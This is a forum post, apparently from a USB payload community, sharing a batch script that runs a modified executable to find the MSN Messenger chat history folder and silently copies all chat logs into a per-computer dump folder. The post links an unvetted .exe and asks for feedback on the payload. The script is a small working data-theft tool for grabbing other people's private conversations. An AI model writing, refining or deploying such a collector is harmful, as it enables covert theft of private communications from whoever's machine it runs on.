Jump to content

Messenger log package, what do you think


Gandalf the l33er

Recommended Posts

I decided to come up with something new. This package first puts the dir to the messenger chat history folder in a text file (coudn't see any elegant way to do it), and then reads the textfile and put the dir in a var. Then it copies the chatlog.

Needed file: http://www.myupload.dk/showfile/9418f7520.exe/

Commands:

.MsnHistory.exe>msnlogdir.txt
Set /P MSNLOG=<msnlogdir.txt
del msnlogdir.txt
md WIPdump%computername%Chatlog
xcopy /E /C /H /Y /I "%MSNLOG%" "WIPdump%computername%Chatlog"

What do you think?

(the little cmdline app is a modded version of some code from some forum)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...